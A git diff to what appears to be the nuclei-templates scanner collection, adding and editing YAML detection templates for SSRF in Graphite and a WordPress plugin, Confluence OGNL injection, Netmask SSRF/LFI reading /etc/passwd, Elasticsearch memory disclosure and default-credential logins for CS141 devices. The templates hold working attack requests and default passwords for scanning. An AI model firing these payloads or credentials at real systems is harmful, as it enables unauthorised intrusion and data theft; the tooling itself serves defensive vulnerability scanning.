diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml new file mode 100644 index 0000000000..bf1abb9b15 --- /dev/null +++ b/cves/2017/CVE-2017-18638.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-18638 + +info: + name: Graphite 'graphite.composer.views.send_email' SSRF + author: huowuzhao + severity: high + description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + reference: + - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html + - https://github.com/graphite-project/graphite-web/issues/2008 + - https://github.com/advisories/GHSA-vfj6-275q-4pvm + - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 + tags: cve,cve2017,graphite,ssrf,oob + +requests: + - method: GET + path: + - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 7b9df06171..00eb781972 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -18,7 +18,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "phpmyadmin.net" diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index e2a6243b8b..3c31a10ae9 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -8,6 +8,8 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi requests: @@ -17,7 +19,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml new file mode 100644 index 0000000000..00e084429e --- /dev/null +++ b/cves/2020/CVE-2020-28976.yaml @@ -0,0 +1,25 @@ +id: CVE-2020-28976 + +info: + name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) + author: LogicalHunter + severity: high + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. + reference: + - https://www.exploit-db.com/exploits/49189 + - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index a4df4fd3d9..e4043100bf 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -13,9 +13,6 @@ info: - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html # vendor homepage -# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. -# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. - requests: - method: GET path: diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml new file mode 100644 index 0000000000..e018f535d1 --- /dev/null +++ b/cves/2021/CVE-2021-22145.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-22145 + +info: + name: ElasticSearch 7.13.3 - Memory disclosure + author: dhiyaneshDk + severity: medium + description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml + - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 + - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html + tags: cve,cve2021,elascticsearch + +requests: + - method: POST + path: + - '{{BaseURL}}/_bulk' + headers: + Content-Type: application/json + body: | + @ + + matchers-condition: and + matchers: + + - type: word + words: + - 'root_cause' + - 'truncated' + - 'reason' + part: body + condition: and + + - type: status + status: + - 400 diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index c37f54cd81..1ef19a23c1 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -1,25 +1,40 @@ id: CVE-2021-26084 info: - author: dhiyaneshDk + author: dhiyaneshDk,philippedelteil severity: critical name: Confluence Server OGNL injection - RCE description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. tags: cve,cve2021,rce,confluence reference: - https://jira.atlassian.com/browse/CONFSERVER-67940 - - https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md + - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://github.com/Udyz/CVE-2021-26084 requests: - raw: - | - POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + POST /{{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + payloads: + path: + - pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action?SpaceKey=x + - pages/doenterpagevariables.action + - pages/createpage.action?spaceKey=myproj + - pages/templates2/viewpagetemplate.action + - pages/createpage-entervariables.action + - template/custom/content-editor + - templates/editor-preload-container + - users/user-dark-features + + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -29,4 +44,4 @@ requests: - type: word part: body words: - - 'value="aaaa{140592=null}' \ No newline at end of file + - 'value="aaaa{140592=null}' diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml new file mode 100644 index 0000000000..d591e23f66 --- /dev/null +++ b/cves/2021/CVE-2021-28918.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-28918 + +info: + name: Netmask NPM Package SSRF + author: johnjhacking + severity: critical + description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. + tags: cve,cve2021,npm,netmask,ssrf,lfi + reference: + - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 + - https://github.com/advisories/GHSA-pch5-whg9-qr2r + +requests: + - method: GET + path: + - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "Apache Server Status" + - "Server Version" + condition: and + + - type: regex + regex: + - "root:.*:0:0:" diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml new file mode 100644 index 0000000000..531ed5ae2d --- /dev/null +++ b/default-logins/abb/cs141-default-login.yaml @@ -0,0 +1,65 @@ +id: cs141-default-login + +info: + name: CS141 SNMP Module Default Credentials + author: socketz + severity: medium + reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf + tags: hiawatha,iot,default-login + +requests: + - raw: + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"admin","password":"cs141-snmp"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"engineer","password":"engineer"} + + - | + POST /api/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 44 + Accept: application/json, text/plain, */* + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: en,es-ES;q=0.9,es;q=0.8 + Connection: close + + {"userName":"guest","password":"guest"} + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - 'accessToken' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - accessToken diff --git a/miscellaneous/missing-csp.yaml b/miscellaneous/missing-csp.yaml deleted file mode 100644 index 0d2a7dc176..0000000000 --- a/miscellaneous/missing-csp.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-csp -info: - name: CSP Not Enforced - author: geeknik - severity: info - description: Checks if there is a CSP header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''content-security-policy'')' diff --git a/miscellaneous/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml deleted file mode 100644 index 3f07038249..0000000000 --- a/miscellaneous/missing-hsts.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-hsts -info: - name: Strict Transport Security Not Enforced - author: Dawid Czarnecki - severity: info - description: Checks if the HSTS is enabled by looking for Strict Transport Security response header. - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''strict-transport-security'')' diff --git a/miscellaneous/missing-x-content-type-options.yaml b/miscellaneous/missing-x-content-type-options.yaml deleted file mode 100644 index e059f4c9be..0000000000 --- a/miscellaneous/missing-x-content-type-options.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: missing-x-content-type-options - -info: - name: X-Content-Type-Options unidentified - author: G4L1T0 and @convisoappsec - severity: info - description: Check for X-Content-Type-Options header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''x-content-type-options'')' diff --git a/miscellaneous/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml deleted file mode 100644 index a7bece93c3..0000000000 --- a/miscellaneous/missing-x-frame-options.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: missing-x-frame-options - -info: - name: Clickjacking (Missing XFO header) - author: kurohost - severity: low - tags: misc,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - "!contains(tolower(all_headers), 'x-frame-options')" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml new file mode 100644 index 0000000000..aef6738399 --- /dev/null +++ b/misconfiguration/http-missing-security-headers.yaml @@ -0,0 +1,127 @@ +id: http-missing-security-headers + +info: + name: HTTP Missing Security Headers + author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki + severity: info + description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + tags: misconfig,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 3 + matchers-condition: or + matchers: + - type: regex + name: strict-transport-security + regex: + - "(?i)strict-transport-security" + negative: true + part: header + + - type: regex + name: content-security-policy + regex: + - "(?i)content-security-policy" + negative: true + part: header + + - type: regex + name: x-frame-options + regex: + - "(?i)x-frame-options" + negative: true + part: header + + - type: regex + name: x-content-type-options + regex: + - "(?i)x-content-type-options" + negative: true + part: header + + - type: regex + name: x-permitted-cross-domain-policies + regex: + - "(?i)x-permitted-cross-domain-policies" + negative: true + part: header + + - type: regex + name: referrer-policy + regex: + - "(?i)referrer-policy" + negative: true + part: header + + - type: regex + name: clear-site-data + regex: + - "(?i)clear-site-data" + negative: true + part: header + + - type: regex + name: cross-origin-embedder-policy + regex: + - "(?i)cross-origin-embedder-policy" + negative: true + part: header + + - type: regex + name: cross-origin-opener-policy + regex: + - "(?i)cross-origin-opener-policy" + negative: true + part: header + + - type: regex + name: cross-origin-resource-policy + regex: + - "(?i)cross-origin-resource-policy" + negative: true + part: header + + - type: regex + name: access-control-allow-origin + regex: + - "(?i)access-control-allow-origin" + negative: true + part: header + + - type: regex + name: access-control-allow-credentials + regex: + - "(?i)access-control-allow-credentials" + negative: true + part: header + + - type: regex + name: access-control-expose-headers + regex: + - "(?i)access-control-expose-headers" + negative: true + part: header + + - type: regex + name: access-control-max-age + regex: + - "(?i)access-control-max-age" + negative: true + part: header + + - type: regex + name: access-control-allow-methods + regex: + - "(?i)access-control-allow-methods" + negative: true + part: header + + - type: regex + name: access-control-allow-headers + regex: + - "(?i)access-control-allow-headers" \ No newline at end of file diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index d4b4f20178..02bd1efcb3 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -2,31 +2,39 @@ id: php_errors info: name: PHP errors - author: w4cky_ + author: w4cky_,geeknik severity: info - tags: debug + tags: debug,php requests: - method: GET path: - "{{BaseURL}}" - matchers: - - type: word - words: - - "Fatal error" - - "Call to undefined method" - - "You have an error in your SQL syntax;" - - "MySQL server version for the right syntax to use near" - - "PHP Warning" - - "PHP Error" - - "Warning: mysql_connect():" - - "Warning: mysql_query()" - - "Warning: pg_connect():" - - "failed to open stream: HTTP request failed" - - "SAFE MODE Restriction in effect." - - "Cannot modify header information" - - "ORA-00921: unexpected end of SQL command" - - "ORA-00933: SQL command not properly ended" - - "ORA-00936: missing expression" - - "ORA-12541: TNS:no listener" \ No newline at end of file + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' + - '(?i)PHP (Warning|Error)' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)(syntax|parse) error' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml index aefceea0d0..1b441eeeef 100644 --- a/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/vulnerabilities/other/mcafee-epo-rce.yaml @@ -8,7 +8,7 @@ info: A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO) is a type of Path Traversal occurring when archives are unpacked if the names of the packed files are not properly sanitized. - An attacker can create archives with files containing “../” in their names, + An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. reference: